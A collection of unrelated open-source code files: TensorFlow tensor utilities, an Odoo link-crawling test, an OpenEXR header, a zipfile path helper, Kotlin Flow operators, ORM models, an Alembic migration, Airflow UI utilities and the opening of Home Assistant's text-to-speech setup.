raise TypeError("tensor_proto is not a tensor_pb2.TensorProto object")
if isinstance(shape, tensor_shape_pb2.TensorShapeProto):
shape = [d.size for d in shape.dim]
elif not isinstance(shape, (list, tuple)):
raise TypeError("shape is not a list or tuple")
tensor_shape_list = [d.size for d in tensor_proto.tensor_shape.dim]
return all(x == y for x, y in zip(tensor_shape_list, shape))
def _ConstantValue(tensor):
# TODO(touts): Support Variables?
if not isinstance(tensor, ops.Tensor):
raise TypeError("tensor is not a Tensor")
if tensor.op.type == "Const":
return MakeNdarray(tensor.op.get_attr("value"))
elif tensor.op.type == "Shape":
input_shape = tensor.op.inputs[0].get_shape()
if input_shape.is_fully_defined():
return np.array([dim.value for dim in input_shape.dims],
dtype=tensor.dtype.as_numpy_dtype)
else:
return None
elif tensor.op.type == "Size":
input_shape = tensor.op.inputs[0].get_shape()
if input_shape.is_fully_defined():
return np.prod([dim.value for dim in input_shape.dims], dtype=np.int32)
else:
return None
elif tensor.op.type == "Rank":
input_shape = tensor.op.inputs[0].get_shape()
if input_shape.ndims is not None:
return np.ndarray(shape=(), buffer=np.array([input_shape.ndims]),
dtype=np.int32)
else:
return None
elif tensor.op.type == "Range":
start = constant_value(tensor.op.inputs[0])
if start is None:
return None
limit = constant_value(tensor.op.inputs[1])
if limit is None:
return None
delta = constant_value(tensor.op.inputs[2])
if delta is None:
return None
return np.arange(start, limit, delta, dtype=tensor.dtype.as_numpy_dtype)
elif tensor.op.type == "Cast":
pre_cast = constant_value(tensor.op.inputs[0])
if pre_cast is None:
return None
cast_dtype = dtypes.as_dtype(tensor.op.get_attr("DstT"))
return pre_cast.astype(cast_dtype.as_numpy_dtype)
elif tensor.op.type == "Concat":
dim = constant_value(tensor.op.inputs[0])
if dim is None:
return None
values = []
for x in tensor.op.inputs[1:]:
value = constant_value(x)
if value is None:
return None
values.append(value)
return np.concatenate(values, axis=dim)
elif tensor.op.type == "ConcatV2":
dim = constant_value(tensor.op.inputs[-1])
if dim is None:
return None
values = []
for x in tensor.op.inputs[:-1]:
value = constant_value(x)
if value is None:
return None
values.append(value)
return np.concatenate(values, axis=dim)
elif tensor.op.type == "Pack":
values = []
# Some imported GraphDefs have Pack ops with zero inputs. Those are invalid
# and shouldn't be produced, but to deal sensibly with them here we check
# and return None.
if not tensor.op.inputs:
return None
for x in tensor.op.inputs:
value = constant_value(x)
if value is None:
return None
values.append(value)
return np.array(values)
elif tensor.op.type == "Fill":
fill_shape = tensor.shape
fill_value = constant_value(tensor.op.inputs[1])
if fill_shape.is_fully_defined() and fill_value is not None:
return np.full(fill_shape.as_list(), fill_value, dtype=fill_value.dtype)
else:
return None
else:
return None
def constant_value(tensor):
"""Returns the constant value of the given tensor, if efficiently calculable.
This function attempts to partially evaluate the given tensor, and
returns its value as a numpy ndarray if this succeeds.
TODO(mrry): Consider whether this function should use a registration
mechanism like gradients and ShapeFunctions, so that it is easily
extensible.
NOTE: If `constant_value(tensor)` returns a non-`None` result, it will no
longer be possible to feed a different value for `tensor`. This allows the
result of this function to influence the graph that is constructed, and
permits static shape optimizations.
Args:
tensor: The Tensor to be evaluated.
Returns:
A numpy ndarray containing the constant value of the given `tensor`,
or None if it cannot be calculated.
Raises:
TypeError: if tensor is not an ops.Tensor.
"""
ret = _ConstantValue(tensor)
if ret is not None:
# The caller may now depend on the constant value of `tensor`, so we
# conservatively prevent it from being fed.
tensor.graph.prevent_feeding(tensor)
return ret
def constant_value_as_shape(tensor): # pylint: disable=invalid-name
"""A version of `constant_value()` that returns a `TensorShape`.
This version should be used when a constant tensor value is
interpreted as a (possibly partial) shape, e.g. in the shape
function for `tf.reshape()`. By explicitly requesting a
`TensorShape` as the return value, it is possible to represent
unknown dimensions; by contrast, `constant_value()` is
all-or-nothing.
Args:
tensor: The rank-1 Tensor to be evaluated.
Returns:
A `TensorShape` based on the constant value of the given `tensor`.
"""
shape = tensor.get_shape().with_rank(1)
if tensor.get_shape() == [0]:
return tensor_shape.scalar()
elif tensor.op.type == "Shape":
return tensor.op.inputs[0].get_shape()
elif tensor.op.type == "Pack":
ret = tensor_shape.scalar() # Empty list.
for pack_input in tensor.op.inputs:
# `pack_input` must be a scalar. Attempt to evaluate it, and append it
# to `ret`.
pack_input_val = constant_value(pack_input)
if pack_input_val is None or pack_input_val < 0:
new_dim = tensor_shape.Dimension(None)
else:
new_dim = tensor_shape.Dimension(pack_input_val)
ret = ret.concatenate([new_dim])
return ret
elif tensor.op.type == "Concat":
# We assume that `tensor.op.inputs[0]` evaluates to 0, as this is
# the only legal value when concatenating vectors, and it will
# have been checked by a previous shape function.
ret = tensor_shape.scalar() # Empty list.
for concat_input in tensor.op.inputs[1:]:
# `concat_input` must be a vector. Attempt to evaluate it as a shape,
# and concatenate it with `ret`.
ret = ret.concatenate(constant_value_as_shape(concat_input))
return ret
elif tensor.op.type == "ConcatV2":
# We assume that `tensor.op.inputs[-1]` evaluates to 0, as this is
# the only legal value when concatenating vectors, and it will
# have been checked by a previous shape function.
ret = tensor_shape.scalar() # Empty list.
for concat_input in tensor.op.inputs[:-1]:
# `concat_input` must be a vector. Attempt to evaluate it as a shape,
# and concatenate it with `ret`.
ret = ret.concatenate(constant_value_as_shape(concat_input))
return ret
else:
ret = tensor_shape.unknown_shape(shape[0].value)
value = constant_value(tensor)
if value is not None:
ret = ret.merge_with(tensor_shape.TensorShape(
[d if d != -1 else None for d in value]))
return ret
def is_tensor(x): # pylint: disable=invalid-name
"""Check whether `x` is of tensor type.
Check whether an object is a tensor. Equivalent to
`isinstance(x, [tf.Tensor, tf.SparseTensor, tf.Variable])`.
Args:
x: An python object to check.
Returns:
`True` if `x` is a tensor, `False` if not.
"""
return isinstance(x, ops._TensorLike) or ops.is_dense_tensor_like(x) # pylint: disable=protected-access
|
unknown
|
codeparrot/codeparrot-clean
| ||
# -*- coding: utf-8 -*-
import logging
import urlparse
import time
import lxml.html
import openerp
import re
_logger = logging.getLogger(__name__)
class Crawler(openerp.tests.HttpCase):
""" Test suite crawling an openerp CMS instance and checking that all
internal links lead to a 200 response.
If a username and a password are provided, authenticates the user before
starting the crawl
"""
at_install = False
post_install = True
def crawl(self, url, seen=None, msg=''):
if seen == None:
seen = set()
url_slug = re.sub(r"[/](([^/=?&]+-)?[0-9]+)([/]|$)", '/<slug>/', url)
url_slug = re.sub(r"([^/=?&]+)=[^/=?&]+", '\g<1>=param', url_slug)
if url_slug in seen:
return seen
else:
seen.add(url_slug)
_logger.info("%s %s", msg, url)
r = self.url_open(url)
code = r.getcode()
self.assertIn( code, xrange(200, 300), "%s Fetching %s returned error response (%d)" % (msg, url, code))
if r.info().gettype() == 'text/html':
doc = lxml.html.fromstring(r.read())
for link in doc.xpath('//a[@href]'):
href = link.get('href')
parts = urlparse.urlsplit(href)
# href with any fragment removed
href = urlparse.urlunsplit((
parts.scheme,
parts.netloc,
parts.path,
parts.query,
''
))
# FIXME: handle relative link (not parts.path.startswith /)
if parts.netloc or \
not parts.path.startswith('/') or \
parts.path == '/web' or\
parts.path.startswith('/web/') or \
parts.path.startswith('/en_US/') or \
(parts.scheme and parts.scheme not in ('http', 'https')):
continue
self.crawl(href, seen, msg)
return seen
def test_10_crawl_public(self):
t0 = time.time()
t0_sql = self.registry.test_cr.sql_log_count
seen = self.crawl('/', msg='Anonymous Coward')
count = len(seen)
duration = time.time() - t0
sql = self.registry.test_cr.sql_log_count - t0_sql
_logger.log(25, "public crawled %s urls in %.2fs %s queries, %.3fs %.2fq per request, ", count, duration, sql, duration/count, float(sql)/count)
def test_20_crawl_demo(self):
t0 = time.time()
t0_sql = self.registry.test_cr.sql_log_count
self.authenticate('demo', 'demo')
seen = self.crawl('/', msg='demo')
count = len(seen)
duration = time.time() - t0
sql = self.registry.test_cr.sql_log_count - t0_sql
_logger.log(25, "demo crawled %s urls in %.2fs %s queries, %.3fs %.2fq per request", count, duration, sql, duration/count, float(sql)/count)
def test_30_crawl_admin(self):
t0 = time.time()
t0_sql = self.registry.test_cr.sql_log_count
self.authenticate('admin', 'admin')
seen = self.crawl('/', msg='admin')
count = len(seen)
duration = time.time() - t0
sql = self.registry.test_cr.sql_log_count - t0_sql
_logger.log(25, "admin crawled %s urls in %.2fs %s queries, %.3fs %.2fq per request", count, duration, sql, duration/count, float(sql)/count)
|
unknown
|
codeparrot/codeparrot-clean
| ||
///////////////////////////////////////////////////////////////////////////
//
// Copyright (c) 2012, Industrial Light & Magic, a division of Lucas
// Digital Ltd. LLC
//
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Industrial Light & Magic nor the names of
// its contributors may be used to endorse or promote products derived
// from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//
///////////////////////////////////////////////////////////////////////////
#ifndef INCLUDED_ILMTHREADNAMESPACE_H
#define INCLUDED_ILMTHREADNAMESPACE_H
//
// The purpose of this file is to make it possible to specify an
// ILMTHREAD_INTERNAL_NAMESPACE as a preprocessor definition and have all of
// the IlmThread symbols defined within that namespace rather than the
// standard IlmThread namespace. Those symbols are made available to client
// code through the ILMTHREAD_NAMESPACE in addition to the
// ILMTHREAD_INTERNAL_NAMESPACE.
//
// To ensure source code compatibility, the ILMTHREAD_NAMESPACE defaults to
// IlmThread and then "using namespace ILMTHREAD_INTERNAL_NAMESPACE;" brings
// all of the declarations from the ILMTHREAD_INTERNAL_NAMESPACE into the
// ILMTHREAD_NAMESPACE. This means that client code can continue to use
// syntax like IlmThread::Thread, but at link time it will resolve to a
// mangled symbol based on the ILMTHREAD_INTERNAL_NAMESPACE.
//
// As an example, if one needed to build against a newer version of IlmThread
// and have it run alongside an older version in the same application, it is
// now possible to use an internal namespace to prevent collisions between
// the older versions of IlmThread symbols and the newer ones. To do this,
// the following could be defined at build time:
//
// ILMTHREAD_INTERNAL_NAMESPACE = IlmThread_v2
//
// This means that declarations inside IlmThread headers look like this
// (after the preprocessor has done its work):
//
// namespace IlmThread_v2 {
// ...
// class declarations
// ...
// }
//
// namespace IlmThread {
// using namespace IlmThread_v2;
// }
//
//
// Open Source version of this file pulls in the IlmBaseConfig.h file
// for the configure time options.
//
#include "IlmBaseConfig.h"
#ifndef ILMTHREAD_NAMESPACE
#define ILMTHREAD_NAMESPACE IlmThread
#endif
#ifndef ILMTHREAD_INTERNAL_NAMESPACE
#define ILMTHREAD_INTERNAL_NAMESPACE ILMTHREAD_NAMESPACE
#endif
//
// We need to be sure that we import the internal namespace into the public one.
// To do this, we use the small bit of code below which initially defines
// ILMTHREAD_INTERNAL_NAMESPACE (so it can be referenced) and then defines
// ILMTHREAD_NAMESPACE and pulls the internal symbols into the public
// namespace.
//
namespace ILMTHREAD_INTERNAL_NAMESPACE {}
namespace ILMTHREAD_NAMESPACE {
using namespace ILMTHREAD_INTERNAL_NAMESPACE;
}
//
// There are identical pairs of HEADER/SOURCE ENTER/EXIT macros so that
// future extension to the namespace mechanism is possible without changing
// project source code.
//
#define ILMTHREAD_INTERNAL_NAMESPACE_HEADER_ENTER namespace ILMTHREAD_INTERNAL_NAMESPACE {
#define ILMTHREAD_INTERNAL_NAMESPACE_HEADER_EXIT }
#define ILMTHREAD_INTERNAL_NAMESPACE_SOURCE_ENTER namespace ILMTHREAD_INTERNAL_NAMESPACE {
#define ILMTHREAD_INTERNAL_NAMESPACE_SOURCE_EXIT }
#endif // INCLUDED_ILMTHREADNAMESPACE_H
|
c
|
github
|
https://github.com/opencv/opencv
|
3rdparty/openexr/IlmThread/IlmThreadNamespace.h
|
"""
A helper module that can work with paths
that can refer to data inside a zipfile
XXX: Need to determine if isdir("zipfile.zip")
should return True or False. Currently returns
True, but that might do the wrong thing with
data-files that are zipfiles.
"""
import os as _os
import zipfile as _zipfile
import errno as _errno
import time as _time
import sys as _sys
import stat as _stat
_DFLT_DIR_MODE = (
_stat.S_IFDIR
| _stat.S_IXOTH
| _stat.S_IXGRP
| _stat.S_IXUSR
| _stat.S_IROTH
| _stat.S_IRGRP
| _stat.S_IRUSR)
_DFLT_FILE_MODE = (
_stat.S_IFREG
| _stat.S_IROTH
| _stat.S_IRGRP
| _stat.S_IRUSR)
if _sys.version_info[0] == 2:
from StringIO import StringIO as _BaseStringIO
from StringIO import StringIO as _BaseBytesIO
class _StringIO (_BaseStringIO):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
return False
class _BytesIO (_BaseBytesIO):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
return False
else:
from io import StringIO as _StringIO
from io import BytesIO as _BytesIO
def _locate(path):
full_path = path
if _os.path.exists(path):
return path, None
else:
rest = []
root = _os.path.splitdrive(path)
while path and path != root:
path, bn = _os.path.split(path)
rest.append(bn)
if _os.path.exists(path):
break
if path == root:
raise IOError(
_errno.ENOENT, full_path,
"No such file or directory")
if not _os.path.isfile(path):
raise IOError(
_errno.ENOENT, full_path,
"No such file or directory")
rest.reverse()
return path, '/'.join(rest).strip('/')
_open = open
def open(path, mode='r'):
if 'w' in mode or 'a' in mode:
raise IOError(
_errno.EINVAL, path, "Write access not supported")
elif 'r+' in mode:
raise IOError(
_errno.EINVAL, path, "Write access not supported")
full_path = path
path, rest = _locate(path)
if not rest:
return _open(path, mode)
else:
try:
zf = _zipfile.ZipFile(path, 'r')
except _zipfile.error:
raise IOError(
_errno.ENOENT, full_path,
"No such file or directory")
try:
data = zf.read(rest)
except (_zipfile.error, KeyError):
zf.close()
raise IOError(
_errno.ENOENT, full_path,
"No such file or directory")
zf.close()
if mode == 'rb':
return _BytesIO(data)
else:
if _sys.version_info[0] == 3:
data = data.decode('ascii')
return _StringIO(data)
def listdir(path):
full_path = path
path, rest = _locate(path)
if not rest and not _os.path.isfile(path):
return _os.listdir(path)
else:
try:
zf = _zipfile.ZipFile(path, 'r')
except _zipfile.error:
raise IOError(
_errno.ENOENT, full_path,
"No such file or directory")
result = set()
seen = False
try:
for nm in zf.namelist():
if rest is None:
seen = True
value = nm.split('/')[0]
if value:
result.add(value)
elif nm.startswith(rest):
if nm == rest:
seen = True
value = ''
pass
elif nm[len(rest)] == '/':
seen = True
value = nm[len(rest)+1:].split('/')[0]
else:
value = None
if value:
result.add(value)
except _zipfile.error:
zf.close()
raise IOError(
_errno.ENOENT, full_path,
"No such file or directory")
zf.close()
if not seen:
raise IOError(
_errno.ENOENT, full_path,
"No such file or directory")
return list(result)
def isfile(path):
full_path = path
path, rest = _locate(path)
if not rest:
ok = _os.path.isfile(path)
if ok:
try:
zf = _zipfile.ZipFile(path, 'r')
return False
except (_zipfile.error, IOError):
return True
return False
zf = None
try:
zf = _zipfile.ZipFile(path, 'r')
info = zf.getinfo(rest)
zf.close()
return True
except (KeyError, _zipfile.error):
if zf is not None:
zf.close()
# Check if this is a directory
try:
info = zf.getinfo(rest + '/')
except KeyError:
pass
else:
return False
rest = rest + '/'
for nm in zf.namelist():
if nm.startswith(rest):
# Directory
return False
# No trace in zipfile
raise IOError(
_errno.ENOENT, full_path,
"No such file or directory")
def isdir(path):
full_path = path
path, rest = _locate(path)
if not rest:
ok = _os.path.isdir(path)
if not ok:
try:
zf = _zipfile.ZipFile(path, 'r')
except (_zipfile.error, IOError):
return False
return True
return True
zf = None
try:
try:
zf = _zipfile.ZipFile(path)
except _zipfile.error:
raise IOError(
_errno.ENOENT, full_path,
"No such file or directory")
try:
info = zf.getinfo(rest)
except KeyError:
pass
else:
# File found
return False
rest = rest + '/'
try:
info = zf.getinfo(rest)
except KeyError:
pass
else:
# Directory entry found
return True
for nm in zf.namelist():
if nm.startswith(rest):
return True
raise IOError(
_errno.ENOENT, full_path,
"No such file or directory")
finally:
if zf is not None:
zf.close()
def islink(path):
full_path = path
path, rest = _locate(path)
if not rest:
return _os.path.islink(path)
try:
zf = _zipfile.ZipFile(path)
except _zipfile.error:
raise IOError(
_errno.ENOENT, full_path,
"No such file or directory")
try:
try:
info = zf.getinfo(rest)
except KeyError:
pass
else:
# File
return False
rest += '/'
try:
info = zf.getinfo(rest)
except KeyError:
pass
else:
# Directory
return False
for nm in zf.namelist():
if nm.startswith(rest):
# Directory without listing
return False
raise IOError(
_errno.ENOENT, full_path,
"No such file or directory")
finally:
zf.close()
def readlink(path):
full_path = path
path, rest = _locate(path)
if rest:
# No symlinks inside zipfiles
raise OSError(
_errno.ENOENT, full_path,
"No such file or directory")
return _os.readlink(path)
def getmode(path):
full_path = path
path, rest = _locate(path)
if not rest:
return _os.stat(path).st_mode
zf = None
try:
zf = _zipfile.ZipFile(path)
info = None
try:
info = zf.getinfo(rest)
except KeyError:
pass
if info is None:
try:
info = zf.getinfo(rest + '/')
except KeyError:
pass
if info is None:
rest = rest + '/'
for nm in zf.namelist():
if nm.startswith(rest):
break
else:
raise IOError(
_errno.ENOENT, full_path,
"No such file or directory")
# Directory exists, but has no entry of its own.
return _DFLT_DIR_MODE
# The mode is stored without file-type in external_attr.
if (info.external_attr >> 16) != 0:
return _stat.S_IFREG | (info.external_attr >> 16)
else:
return _DFLT_FILE_MODE
except KeyError:
if zf is not None:
zf.close()
raise IOError(
_errno.ENOENT, full_path,
"No such file or directory")
def getmtime(path):
full_path = path
path, rest = _locate(path)
if not rest:
return _os.path.getmtime(path)
zf = None
try:
zf = _zipfile.ZipFile(path)
info = None
try:
info = zf.getinfo(rest)
except KeyError:
pass
if info is None:
try:
info = zf.getinfo(rest + '/')
except KeyError:
pass
if info is None:
rest = rest + '/'
for nm in zf.namelist():
if nm.startswith(rest):
break
else:
raise IOError(
_errno.ENOENT, full_path,
"No such file or directory")
# Directory exists, but has no entry of its
# own, fake mtime by using the timestamp of
# the zipfile itself.
return _os.path.getmtime(path)
return _time.mktime(info.date_time + (0, 0, -1))
except KeyError:
if zf is not None:
zf.close()
raise IOError(
_errno.ENOENT, full_path,
"No such file or directory")
|
unknown
|
codeparrot/codeparrot-clean
| ||
@file:JvmMultifileClass
@file:JvmName("FlowKt")
package kotlinx.coroutines.flow
import kotlinx.coroutines.*
import kotlin.jvm.*
/**
* A terminal operator that returns `true` and immediately cancels the flow
* if at least one element matches the given [predicate].
*
* If the flow does not emit any elements or no element matches the predicate, the function returns `false`.
*
* Equivalent to `!all { !predicate(it) }` (see [Flow.all]) and `!none { predicate(it) }` (see [Flow.none]).
*
* Example:
*
* ```
* val myFlow = flow {
* repeat(10) {
* emit(it)
* }
* throw RuntimeException("You still didn't find the required number? I gave you ten!")
* }
* println(myFlow.any { it > 5 }) // true
* println(flowOf(1, 2, 3).any { it > 5 }) // false
* ```
*
* @see Iterable.any
* @see Sequence.any
*/
public suspend fun <T> Flow<T>.any(predicate: suspend (T) -> Boolean): Boolean {
var found = false
collectWhile {
val satisfies = predicate(it)
if (satisfies) found = true
!satisfies
}
return found
}
/**
* A terminal operator that returns `true` if all elements match the given [predicate],
* or returns `false` and cancels the flow as soon as the first element not matching the predicate is encountered.
*
* If the flow terminates without emitting any elements, the function returns `true` because there
* are no elements in it that *do not* match the predicate.
* See a more detailed explanation of this logic concept in the
* ["Vacuous truth"](https://en.wikipedia.org/wiki/Vacuous_truth) article.
*
* Equivalent to `!any { !predicate(it) }` (see [Flow.any]) and `none { !predicate(it) }` (see [Flow.none]).
*
* Example:
*
* ```
* val myFlow = flow {
* repeat(10) {
* emit(it)
* }
* throw RuntimeException("You still didn't find the required number? I gave you ten!")
* }
* println(myFlow.all { it <= 5 }) // false
* println(flowOf(1, 2, 3).all { it <= 5 }) // true
* ```
*
* @see Iterable.all
* @see Sequence.all
*/
public suspend fun <T> Flow<T>.all(predicate: suspend (T) -> Boolean): Boolean {
var foundCounterExample = false
collectWhile {
val satisfies = predicate(it)
if (!satisfies) foundCounterExample = true
satisfies
}
return !foundCounterExample
}
/**
* A terminal operator that returns `true` if no elements match the given [predicate],
* or returns `false` and cancels the flow as soon as the first element matching the predicate is encountered.
*
* If the flow terminates without emitting any elements, the function returns `true` because there
* are no elements in it that match the predicate.
* See a more detailed explanation of this logic concept in the
* ["Vacuous truth"](https://en.wikipedia.org/wiki/Vacuous_truth) article.
*
* Equivalent to `!any(predicate)` (see [Flow.any]) and `all { !predicate(it) }` (see [Flow.all]).
*
* Example:
* ```
* val myFlow = flow {
* repeat(10) {
* emit(it)
* }
* throw RuntimeException("You still didn't find the required number? I gave you ten!")
* }
* println(myFlow.none { it > 5 }) // false
* println(flowOf(1, 2, 3).none { it > 5 }) // true
* ```
*
* @see Iterable.none
* @see Sequence.none
*/
public suspend fun <T> Flow<T>.none(predicate: suspend (T) -> Boolean): Boolean = !any(predicate)
|
kotlin
|
github
|
https://github.com/Kotlin/kotlinx.coroutines
|
kotlinx-coroutines-core/common/src/flow/terminal/Logic.kt
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'xieshaoxin'
from transwrap.db import next_id
from transwrap.orm import FloatField,Model,StringField,BooleanFiled,IntegerField,TextField
import time
class User(Model):
__table__ = 'user'
id = StringField(primary_key=True, default=next_id(), type="varchar(50)")
name = StringField(type='varchar(50)')
email = StringField(updatable=False, type='varchar(50)')
admin = BooleanFiled()
passwd = StringField(type="varchar(50)")
created_at = FloatField(updatable=False, default=time.time)
image = StringField(type='varchar(500)')
class Blog(Model):
__table__ = 'blog'
id = StringField(primary_key=True, default=next_id(), type="varchar(50)")
user_id = StringField(updatable=False,type="varchar(50)")
user_name = StringField(type='varchar(50)')
user_image = StringField(type='varchar(500)')
summary = StringField(type='varchar(200)')
name = StringField(type="varchar(50)")
content = TextField()
created_at = FloatField(updatable=False, default=time.time)
class Comment(Model):
__table__ = 'comment'
id = StringField(primary_key=True, default=next_id(), type="varchar(50)")
user_id = StringField(updatable=False,type="varchar(50)")
user_name = StringField(type='varchar(50)')
user_image = StringField(type='varchar(500)')
blog_id = StringField(updatable=False,type="varchar(50)")
content = TextField()
created_at = FloatField(updatable=False, default=time.time)
if __name__ == '__main__':
print User().__sql__()
print Blog.__sql__()
print Comment.__sql__()
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Copyright 2016 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""audit support
Revision ID: 2ff0a0e360f1
Revises: 22f5385a3d50
Create Date: 2016-06-02 15:14:31.888078
"""
# flake8: noqa: E402
# revision identifiers, used by Alembic.
revision = '2ff0a0e360f1'
down_revision = '22f5385a3d50'
from alembic import op
import sqlalchemy as sa
def upgrade(active_plugins=None, options=None):
for table in ['vims', 'vnf', 'vnfd']:
op.add_column(table,
sa.Column('created_at', sa.DateTime(), nullable=True))
op.add_column(table,
sa.Column('updated_at', sa.DateTime(), nullable=True))
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*!
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
import type { GridNodeResponse, NodeResponse } from "openapi/requests/types.gen";
export type GridTask = {
depth: number;
isGroup?: boolean;
isOpen?: boolean;
} & GridNodeResponse;
export const flattenNodes = (
nodes: Array<GridNodeResponse> | undefined,
openGroupIds: Array<string>,
depth: number = 0,
) => {
let flatNodes: Array<GridTask> = [];
let allGroupIds: Array<string> = [];
nodes?.forEach((node) => {
if (node.children) {
const { children, ...rest } = node;
flatNodes.push({ ...rest, depth, isGroup: true, isOpen: openGroupIds.includes(node.id) });
allGroupIds.push(node.id);
const { allGroupIds: childGroupIds, flatNodes: childNodes } = flattenNodes(
children,
openGroupIds,
depth + 1,
);
flatNodes = [...flatNodes, ...(openGroupIds.includes(node.id) ? childNodes : [])];
allGroupIds = [...allGroupIds, ...childGroupIds];
} else {
flatNodes.push({ ...node, depth });
}
});
return { allGroupIds, flatNodes };
};
export const flattenGraphNodes = (
nodes: Array<NodeResponse>,
depth: number = 0,
): { allGroupIds: Array<string> } => {
let allGroupIds: Array<string> = [];
nodes.forEach((node) => {
if (node.children) {
allGroupIds.push(node.id);
const { allGroupIds: childGroupIds } = flattenGraphNodes(node.children, depth + 1);
allGroupIds = [...allGroupIds, ...childGroupIds];
}
});
return { allGroupIds };
};
|
typescript
|
github
|
https://github.com/apache/airflow
|
airflow-core/src/airflow/ui/src/layouts/Details/Grid/utils.ts
|
"""Provide functionality to TTS."""
import asyncio
import ctypes
import functools as ft
import hashlib
import io
import logging
import mimetypes
import os
import re
from aiohttp import web
import voluptuous as vol
from homeassistant.components.http import HomeAssistantView
from homeassistant.components.media_player.const import (
ATTR_MEDIA_CONTENT_ID,
ATTR_MEDIA_CONTENT_TYPE,
MEDIA_TYPE_MUSIC,
SERVICE_PLAY_MEDIA,
)
from homeassistant.components.media_player.const import DOMAIN as DOMAIN_MP
from homeassistant.const import ATTR_ENTITY_ID, ENTITY_MATCH_ALL, CONF_PLATFORM
from homeassistant.core import callback
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import config_per_platform
import homeassistant.helpers.config_validation as cv
from homeassistant.setup import async_prepare_setup_platform
_LOGGER = logging.getLogger(__name__)
ATTR_CACHE = "cache"
ATTR_LANGUAGE = "language"
ATTR_MESSAGE = "message"
ATTR_OPTIONS = "options"
ATTR_PLATFORM = "platform"
CONF_BASE_URL = "base_url"
CONF_CACHE = "cache"
CONF_CACHE_DIR = "cache_dir"
CONF_LANG = "language"
CONF_SERVICE_NAME = "service_name"
CONF_TIME_MEMORY = "time_memory"
DEFAULT_CACHE = True
DEFAULT_CACHE_DIR = "tts"
DEFAULT_TIME_MEMORY = 300
DOMAIN = "tts"
MEM_CACHE_FILENAME = "filename"
MEM_CACHE_VOICE = "voice"
SERVICE_CLEAR_CACHE = "clear_cache"
SERVICE_SAY = "say"
_RE_VOICE_FILE = re.compile(r"([a-f0-9]{40})_([^_]+)_([^_]+)_([a-z_]+)\.[a-z0-9]{3,4}")
KEY_PATTERN = "{0}_{1}_{2}_{3}"
def _deprecated_platform(value):
"""Validate if platform is deprecated."""
if value == "google":
raise vol.Invalid(
"google tts service has been renamed to google_translate,"
" please update your configuration."
)
return value
PLATFORM_SCHEMA = cv.PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_PLATFORM): vol.All(cv.string, _deprecated_platform),
vol.Optional(CONF_CACHE, default=DEFAULT_CACHE): cv.boolean,
vol.Optional(CONF_CACHE_DIR, default=DEFAULT_CACHE_DIR): cv.string,
vol.Optional(CONF_TIME_MEMORY, default=DEFAULT_TIME_MEMORY): vol.All(
vol.Coerce(int), vol.Range(min=60, max=57600)
),
vol.Optional(CONF_BASE_URL): cv.string,
vol.Optional(CONF_SERVICE_NAME): cv.string,
}
)
PLATFORM_SCHEMA_BASE = cv.PLATFORM_SCHEMA_BASE.extend(PLATFORM_SCHEMA.schema)
SCHEMA_SERVICE_SAY = vol.Schema(
{
vol.Required(ATTR_MESSAGE): cv.string,
vol.Optional(ATTR_CACHE): cv.boolean,
vol.Optional(ATTR_ENTITY_ID): cv.comp_entity_ids,
vol.Optional(ATTR_LANGUAGE): cv.string,
vol.Optional(ATTR_OPTIONS): dict,
}
)
SCHEMA_SERVICE_CLEAR_CACHE = vol.Schema({})
async def async_setup(hass, config):
"""Set up TTS."""
tts = SpeechManager(hass)
try:
conf = config[DOMAIN][0] if config.get(DOMAIN, []) else {}
use_cache = conf.get(CONF_CACHE, DEFAULT_CACHE)
cache_dir = conf.get(CONF_CACHE_DIR, DEFAULT_CACHE_DIR)
time_memory = conf.get(CONF_TIME_MEMORY, DEFAULT_TIME_MEMORY)
base_url = conf.get(CONF_BASE_URL) or hass.config.api.base_url
await tts.async_init_cache(use_cache, cache_dir, time_memory, base_url)
except (HomeAssistantError, KeyError) as err:
_LOGGER.error("Error on cache init %s", err)
return False
hass.http.register_view(TextToSpeechView(tts))
hass.http.register_view(TextToSpeechUrlView(tts))
